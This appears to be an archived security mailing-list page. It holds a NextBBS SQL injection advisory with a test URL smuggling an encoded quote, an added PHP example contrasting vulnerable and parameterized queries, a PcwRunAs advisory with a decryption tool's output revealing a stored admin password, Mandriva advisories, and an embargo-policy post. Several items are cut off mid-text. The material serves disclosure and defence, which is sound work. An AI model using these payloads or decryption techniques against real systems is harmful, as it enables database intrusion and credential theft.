$filter = urldecode($INPUT['curstr']);
$retstr = '';
// $filter is concatenated straight into the query, no escaping
$qry = "SELECT userid FROM {$CONFIG->dbprfx}users 
WHERE server='{$CONFIG->server}' AND userid like 
'".$filter."%'";
$res = $DB->query($qry);
-[ source code end ]---

As seen above, the user submitted GET parameter curstr is urldecoded and
afterwards used in a SQL query without proper sanitization. By using urlencoded
single quotes it is possible to conduct SQL injection attacks. 

Test:

http://localhost/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe

Result:

SQL Layer Error: You have an error in your SQL syntax; check the manual
that corresponds to your MySQL server version for the right syntax to use
near 'axe%'' at line 1
Query [SELECT userid FROM bb_users WHERE server='1' AND userid like 'war'axe%']
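Added example (not NextBBS code): findUsers() rebuilt with a bound parameter and escaped LIKE wildcards, next to the vulnerable shape, fed the same input the advisory's test URL produces. NextBBS's own $DB layer is replaced here by PDO over an in-memory SQLite table with constructed rows so the example runs offline.

```php
<?php
// Added example, not NextBBS code. PDO + SQLite stand in for the $DB layer;
// table contents are constructed.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec("CREATE TABLE bb_users (userid TEXT, server TEXT)");
$pdo->exec("INSERT INTO bb_users VALUES ('waraxe','1'), ('war_axe','1'), ('bob','2')");

$prefix = 'bb_';   // plays the role of $CONFIG->dbprfx
$server = '1';     // plays the role of $CONFIG->server

// Vulnerable shape from ajaxserver.php: the decoded filter is spliced into
// the SQL text, so a quote inside it changes the structure of the query.
function findUsersVulnerable(PDO $pdo, string $prefix, string $server, string $curstr): array
{
    $filter = urldecode($curstr);
    $qry = "SELECT userid FROM {$prefix}users WHERE server='{$server}' "
         . "AND userid like '" . $filter . "%'";
    return $pdo->query($qry)->fetchAll(PDO::FETCH_COLUMN);
}

// Hardened version: the table prefix stays in the SQL text (it is configuration,
// not user input); the filter is bound as data, and LIKE metacharacters are
// escaped so the caller cannot widen the match with % or _.
function findUsersSafe(PDO $pdo, string $prefix, string $server, string $curstr): array
{
    $filter  = urldecode($curstr);
    $escaped = addcslashes($filter, '\\%_');
    $stmt = $pdo->prepare(
        "SELECT userid FROM {$prefix}users WHERE server = :server "
        . "AND userid LIKE :pattern ESCAPE '\\'"
    );
    $stmt->execute([':server' => $server, ':pattern' => $escaped . '%']);
    return $stmt->fetchAll(PDO::FETCH_COLUMN);
}

// What the script sees for the advisory's test URL: PHP already turned %2527
// into %27 when filling $_GET, and the script's own urldecode() makes it war'axe.
$received = 'war%27axe';

print_r(findUsersSafe($pdo, $prefix, $server, 'war'));      // waraxe, war_axe
print_r(findUsersSafe($pdo, $prefix, $server, 'war_'));     // war_axe only: _ is literal
print_r(findUsersSafe($pdo, $prefix, $server, $received));  // empty: the quote is data

try {
    findUsersVulnerable($pdo, $prefix, $server, $received);
} catch (PDOException $e) {
    // Same failure the advisory shows: like 'war'axe%' is a syntax error
    echo "vulnerable query failed: " . $e->getMessage() . "\n";
}
```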


###
3. SQL Injection in ajaxserver.php function isIdAvailable
###

Reason: using unsanitized user submitted data in SQL queries
Attack vector: user submitted GET parameter id
Preconditions: none
Result: attacker can manipulate database queries

Source code snippet from vulnerable script 

PcwRunAs Password Obfuscation Design Flaw

2012-03-27 Thread otr
# Vuln Title: PcwRunAs Password Obfuscation Design Flaw
# Date: 26.03.2012
# Author: Christian Landström, otr
# Software Link: http://www.pcwelt.de/downloads/pcwRunAs-1215998.html
# Version: <= 0.4
# Tested on: Windows
# CVE : CVE-2012-1793

# Risk: high
# Type: Privilege Escalation
# Vendor: PC-Welt

Timeline:

2012-03-19 Vendor contacted
2012-03-19 Vendor response
2012-03-19 CVE number requested
2012-03-20 CVE number assigned
2012-03-26 Public disclosure

Summary:

The PcwRunAs software available from the PC-Welt website is prone to a
trivial password recovery attack that allows local users to obtain
passwords encrypted with the pcwRunAsGui.exe.

Context:

PcwRunAs is a substitute for the RunAs tool included in the Windows
operating system. The tool allows commands to be run in a different user
context. Usually this is used to execute commands that only higher
privileged users are allowed to run (like administrative or maintenance
tasks). Included in the PcwRunAs package is a tool called pcwRunAsGui
which features the creation of batch scripts that contain an encrypted
version of the command line arguments. This is used to hide the password
information from ordinary users that have access to the batch script but
should not know the administrator password. Currently two versions of
the tool are used in the wild. These are versions 0.3 and 0.4.

Design Flaw:

Both the PcwRunAsGui and the PcwRunAs tool share a common encryption key. By
design it is impossible to let PcwRunAs decrypt the string produced by
PcwRunAsGui without also giving an attacker who wants to decrypt the cipher text
access to that key. Hence the encryption key is embedded in the binaries of both
tools. This allows an attacker to reverse engineer the static encryption key
from the available binaries. The encryption key is derived from a RIPEMD-160
hash (160 bits) that serves as the initialization (key) for the Blowfish
encryption algorithm. This RIPEMD-160 hash is static for each version of the
pcwrunas tool, as it is simply a hash sum of the pcwRunAs.exe executable file.
The plain text command line arguments get Blowfish-ECB encrypted with the static
RIPEMD-160 hash and the result is base64 encoded, e.g. in version 0.3:

/u admin /p test1234 /app C:\WINNT\NOTEPAD.EXE

Becomes, encrypted with blowfish and base64 encoded:

pEmoTVE5jk9r8X1An1CeuVU9yTOVN0SNG7XUZkec+/udmzjTvMOUyk2OofUkMNk/2y7KJkY=

As the string is Blowfish-ECB(!) encrypted, it is possible to brute force
a given base64 string by hand: systematically try different inputs to the
pcwrunasgui tool until the encrypted string one wants to decipher is
reproduced.

By reverse engineering the binaries it is possible to extract the static
RIPEMD-160 hash that is used for encryption and write a tool that takes the
encrypted base64 string and decrypts it using the static RIPEMD-160 hash
(different in versions 0.3 and 0.4). Version 0.4 features a
protection mechanism that salts the encryption key with the hard disk
serial number. However, this feature is not widely used by enterprises, as
administrative batch scripts are usually rolled out to many
workstations; it would mean that a new script has to be created
on each workstation. In any case, an attacker knowing the serial number
is again able to decrypt the cipher text by RIPEMD-160 hashing the number and
the key and using the result as the Blowfish initialization.

Fix:

There is no trivial fix for this problem as this is a flaw by
design. As companies and individuals trust the pcwrunas tool for
securing their administrator password, we suggest that an advisory be
made public in order to inform administrators of the problem.

POC:

./decrypt_pcwrunas
Tool to decrypt blowfish-ebc from the PcwRunAs tool
Author: otr
---
Usage: decrypt_pcwrunas [version] [base64encryptedblowfish]

Example: decrypt_pcwrunas v0.3 
pEmoTVE5jk9r8X1An1CeuVU9yTOVN0SNG7XUZkec+/udmzjTvMOUyk2OofUkMNk/2y7KJkY=
Example: decrypt_pcwrunas v0.4 
EaVnXUyaAbve9Ef4K3QCm2dCzyH9znKcrZBwjaTLCgOT2sWBtCy38DEVTr5S

root@bt ~/Desktop/runwasdec # ./decrypt_pcwrunas v0.4 
EaVnXUyaAbve9Ef4K3QCm2dCzyH9znKcrZBwjaTLCgOT2sWBtCy38DEVTr5S
[+] Decrypted: /u aaa /p  /app a /arg aa

root@bt ~/Desktop/runwasdec # ./decrypt_pcwrunas v0.3 
pEmoTVE5jk9r8X1An1CeuVU9yTOVN0SNG7XUZkec+/udmzjTvMOUyk2OofUkMNk/2y7KJkY=
[+] Decrypted: /u admin /p test1234 /app C:\WINNT\NOTEPAD.EXE


[ MDVSA-2012:040 ] gnutls

2012-03-27 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:040
 http://www.mandriva.com/security/
 ___

 Package : gnutls
 Date: March 27, 2012
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 A vulnerability has been found and corrected in GnuTLS:
 
 gnutls_cipher.c in libgnutls in GnuTLS before 2.12.17 and 3.x before
 3.0.15 does not properly handle data encrypted with a block cipher,
 which allows remote attackers to cause a denial of service (heap
 memory corruption and application crash) via a crafted record, as
 demonstrated by a crafted GenericBlockCipher structure (CVE-2012-1573).
 
 The updated packages have been patched to correct this issue.
 
 The GnuTLS packages for Mandriva Linux 2011 have been upgraded to the
 2.12.8 version due to problems with the test suite while building
 it; additionally, a new dependency was added on p11-kit for the PKCS
 #11 support.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1573
 ___

 Updated Packages:

 ___


Re: CVE-2012-0037: libraptor - XXE in RDF/XML File Interpretation (Multiple office products affected)

2012-03-27 Thread Solar Designer
Hi,

As stated in the timeline below (thanks!), this issue was handled in
part using the Openwall-hosted distros list (which currently notifies
many Linux distro vendors, FreeBSD, and NetBSD/pkgsrc with PGP
re-encryption to individual recipients):

http://oss-security.openwall.org/wiki/mailing-lists/distros

The primary reason why I feel I have to post this follow-up message is
that the long embargo period here was a major violation of the list's
policy.  It is the second major violation so far; the first one was for
HashDoS, and it was similarly discussed on oss-security after the fact:

http://www.openwall.com/lists/oss-security/2011/12/29/4
http://www.openwall.com/lists/oss-security/2011/12/29/7

It's cases like this that may eventually make us reconsider and stop
hosting the non-public lists.  (Some propose automatic publishing of
messages after N days as an alternative.)  Luckily, so far violations
like this have been relatively rare, and one of the reasons why I feel
every one of them needs attention is to keep it so.

I've included more detail below:

On Sat, Mar 24, 2012 at 09:40:42AM -0700, VSR Advisories wrote:
> 2012-01-09  OpenOffice, LibreOffice, AbiWord, KOffice, and libraptor
>             maintainers were provided a draft advisory and test sample.
>             The OpenWall distros mailing list was also notified.
>             Apache OpenOffice Security team acknowledged notification.
>             libraptor developer confirmed flaw.
> 
> 2012-01-10  CVE-2012-0037 assigned by Apache.
> 
> 2012-02-02  Notified OpenWall distros mailing list again, due to previous
>             technical problems.

IIRC, the technical problems being referred to here were an attachment
not being re-encrypted to list members, so they only had partial info
until this point - essentially just the fact that there's a
vulnerability in those products, but with no detail; given the extra
embargo time (not needed by distro vendors) this may actually be good.
The list setup is a bit picky about what encrypted message formats it
supports (besides plaintext, they may be PGP/MIME or PGP inline, but
they can't have individual pre-encrypted attachments - this has since
been clarified on the wiki).

> 2012-02-04  libraptor developer provided patches to all notified parties.
> 
> 2012-02-22  Extensive arguing between vendors about embargo/release date.
> 
> 2012-03-06  More arguing about release date.
> 
> 2012-03-14  Agreed upon release date established.
> 
> 2012-03-22  Security updates and vendor advisories released.
> 
> 2012-03-24  VSR advisory released.

At the time of the initial notification in January, the distros list
policy was to allow a maximum embargo period of 14 days (and this was
stated on the wiki page with the list posting address).  At the time of
the second notification in February, the policy was stated as:

Please note that the maximum acceptable embargo period for issues
disclosed to these lists is 14 to 19 days, with embargoes longer than 14
days (up to 19) allowed in case the issue is reported on a Thursday or a
Friday and the proposed coordinated disclosure date is thus adjusted to
fall on a Monday or a Tuesday.  Please do not ask for a longer embargo.
In fact, embargo periods shorter than 7 days are preferable.

When it became apparent that this was to be violated since one or two of
the affected upstreams wanted much more time, the reporter (Timothy D.
Morgan of VSR Security) explained that at the time of his initial
notification he had thought that 14 days would in fact be enough.  While
this sounds like a rather fundamental problem with a maximum embargo
time policy (it is always possible that something new is discovered
during discussion, which may invalidate the initial time estimate of the
reporter), I've just added the following verbiage to hopefully reduce
the number of such occurrences going forward:

If you have not yet notified upstream projects/developers of the
affected software, other affected distro vendors, and/or affected Open
Source projects, you may want to do so before notifying one of these
mailing lists in order to ensure that these other parties are OK with
the maximum embargo period that would apply (and if not, then you may
have to delay your notification to the mailing list), unless you're
confident you'd choose to ignore their preference anyway and disclose
the issue publicly soon as per the policy stated here.

Of course, I fully expect this attempt to sometimes fail, but maybe -
just maybe - it will help in some cases.  There's no perfect solution
here (although some would reasonably argue that simply not doing any
pre-disclosure coordination is perfect - in a way it is).

The time required by the free office product vendors to issue a security
fix here reminded me of web browsers in the 1990s.  Several web browser
vendors have since learned to issue security fixes much quicker, but
apparently office vendors still lack processes to do so.  Besides, the
timing of the 

[ MDVSA-2012:041 ] expat

2012-03-27 Thread security

 ___

 Mandriva Linux Security Advisory MDVSA-2012:041
 http://www.mandriva.com/security/
 ___

 Package : expat
 Date: March 27, 2012
 Affected: 2010.1, 2011., Enterprise Server 5.0
 ___

 Problem Description:

 A memory leak and a hash table collision flaw in expat could cause
 denial of service (DoS) attacks (CVE-2012-0876, CVE-2012-1148).
 
 The updated packages have been patched to correct these issues.
 ___

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-0876
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1148
 ___

 Updated Packages:

 Mandriva Linux 2010.1:
 ___
